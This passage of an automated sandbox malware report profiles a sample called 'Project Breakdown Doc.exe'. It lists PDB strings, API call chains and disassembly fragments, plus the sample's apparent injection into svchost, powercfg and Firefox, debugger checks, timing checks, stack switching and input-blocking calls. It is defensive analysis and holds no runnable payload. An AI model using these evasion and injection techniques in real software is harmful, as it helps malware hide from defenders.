                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VFfhzkOtKq.exe, 00000005.00000002.2934981003.000000000006E000.00000002.00000001.01000000.00000005.sdmp, VFfhzkOtKq.exe, 00000007.00000000.2336603194.000000000006E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Project Breakdown Doc.exe, 00000000.00000003.1684251389.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, Project Breakdown Doc.exe, 00000000.00000003.1683276387.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2157215051.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2159064996.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2259594003.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2259594003.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937132231.000000000386E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000003.2262467626.0000000003528000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937132231.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000003.2259628969.0000000003372000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Project Breakdown Doc.exe, 00000000.00000003.1684251389.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, Project Breakdown Doc.exe, 00000000.00000003.1683276387.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2157215051.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2159064996.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2259594003.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2259594003.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937132231.000000000386E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000003.2262467626.0000000003528000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937132231.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000006.00000003.2259628969.0000000003372000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: powercfg.exe, 00000006.00000002.2935230373.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937780821.0000000003CFC000.00000004.10000000.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2937216362.000000000286C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2570813989.000000002144C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: powercfg.exe, 00000006.00000002.2935230373.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000006.00000002.2937780821.0000000003CFC000.00000004.10000000.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2937216362.000000000286C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2570813989.000000002144C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: powercfg.pdb source: svchost.exe, 00000001.00000003.2228239971.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2228322978.000000000342D000.00000004.00000020.00020000.00000000.sdmp, VFfhzkOtKq.exe, 00000005.00000002.2936102809.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp
                Source: Project Breakdown Doc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Project Breakdown Doc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Project Breakdown Doc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Project Breakdown Doc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Project Breakdown Doc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CBC304 LoadLibraryA,GetProcAddress,0_2_00CBC304
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CA8719 push FFFFFF8Bh; iretd 0_2_00CA871B
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C6E94F push edi; ret 0_2_00C6E951
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C6EA68 push esi; ret 0_2_00C6EA6A
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C68B85 push ecx; ret 0_2_00C68B98
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C6EC43 push esi; ret 0_2_00C6EC45
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C6ED2C push edi; ret 0_2_00C6ED2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042D863 push edi; iretd 1_2_0042D86C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004051C0 pushad ; ret 1_2_004051CB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414A5F push edx; retf 1_2_00414A60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D48E push cs; ret 1_2_0040D4BB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00424CB3 push edi; ret 1_2_00424CD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004164BD push ecx; ret 1_2_004164DD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403570 push eax; ret 1_2_00403572
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414D03 push ss; ret 1_2_00414D04
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418712 push ebp; iretd 1_2_0041871A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0225F pushad ; ret 1_2_03B027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B027FA pushad ; ret 1_2_03B027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B309AD push ecx; mov dword ptr [esp], ecx1_2_03B309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0283D push eax; iretd 1_2_03B02858
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C44A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C44A35
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CC55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00CC55FD
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C633C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C633C7
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeAPI/Special instruction interceptor: Address: 1783224
                Source: C:\Windows\SysWOW64\powercfg.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\powercfg.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\powercfg.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\powercfg.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\powercfg.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\powercfg.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\powercfg.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\powercfg.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7096E rdtsc 1_2_03B7096E
                Source: C:\Windows\SysWOW64\powercfg.exeWindow / User API: threadDelayed 1845Jump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeWindow / User API: threadDelayed 8128Jump to behavior
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeAPI coverage: 4.4 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\powercfg.exe TID: 7836Thread sleep count: 1845 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exe TID: 7836Thread sleep time: -3690000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exe TID: 7836Thread sleep count: 8128 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exe TID: 7836Thread sleep time: -16256000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\powercfg.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CA4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00CA4696
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CAC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00CAC9C7
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CAC93C FindFirstFileW,FindClose,0_2_00CAC93C
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CAF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CAF200
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CAF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CAF35D
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CAF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CAF65E
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CA3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CA3A2B
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CA3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00CA3D4E
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CABF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CABF27
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C44AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C44AFE
                Source: powercfg.exe, 00000006.00000002.2935230373.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2936350373.00000000009FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000008.00000002.2572768872.0000023C214FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7096E rdtsc 1_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417ED3 LdrLoadDll,1_2_00417ED3
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CB41FD BlockInput,0_2_00CB41FD
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C43B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C43B4C
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C75CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00C75CCC
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CBC304 LoadLibraryA,GetProcAddress,0_2_00CBC304
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_017834F0 mov eax, dword ptr fs:[00000030h]0_2_017834F0
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_01783490 mov eax, dword ptr fs:[00000030h]0_2_01783490
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_01781E70 mov eax, dword ptr fs:[00000030h]0_2_01781E70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]1_2_03B28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]1_2_03B28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]1_2_03B28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]1_2_03B2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]1_2_03B2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]1_2_03B2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5438F mov eax, dword ptr fs:[00000030h]1_2_03B5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5438F mov eax, dword ptr fs:[00000030h]1_2_03B5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B663FF mov eax, dword ptr fs:[00000030h]1_2_03B663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]1_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h]1_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h]1_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]1_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h]1_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD43D4 mov eax, dword ptr fs:[00000030h]1_2_03BD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD43D4 mov eax, dword ptr fs:[00000030h]1_2_03BD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEC3CD mov eax, dword ptr fs:[00000030h]1_2_03BEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]1_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]1_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]1_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]1_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB63C0 mov eax, dword ptr fs:[00000030h]1_2_03BB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0634F mov eax, dword ptr fs:[00000030h]1_2_03C0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C310 mov ecx, dword ptr fs:[00000030h]1_2_03B2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B50310 mov ecx, dword ptr fs:[00000030h]1_2_03B50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]1_2_03B6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]1_2_03B6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]1_2_03B6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD437C mov eax, dword ptr fs:[00000030h]1_2_03BD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C08324 mov eax, dword ptr fs:[00000030h]1_2_03C08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C08324 mov ecx, dword ptr fs:[00000030h]1_2_03C08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C08324 mov eax, dword ptr fs:[00000030h]1_2_03C08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C08324 mov eax, dword ptr fs:[00000030h]1_2_03C08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov ecx, dword ptr fs:[00000030h]1_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]1_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFA352 mov eax, dword ptr fs:[00000030h]1_2_03BFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD8350 mov ecx, dword ptr fs:[00000030h]1_2_03BD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]1_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402A0 mov eax, dword ptr fs:[00000030h]1_2_03B402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402A0 mov eax, dword ptr fs:[00000030h]1_2_03B402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C062D6 mov eax, dword ptr fs:[00000030h]1_2_03C062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]1_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]1_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E284 mov eax, dword ptr fs:[00000030h]1_2_03B6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E284 mov eax, dword ptr fs:[00000030h]1_2_03B6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]1_2_03BB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]1_2_03BB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]1_2_03BB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]1_2_03B402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]1_2_03B402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]1_2_03B402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2823B mov eax, dword ptr fs:[00000030h]1_2_03B2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0625D mov eax, dword ptr fs:[00000030h]1_2_03C0625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]1_2_03BE0274
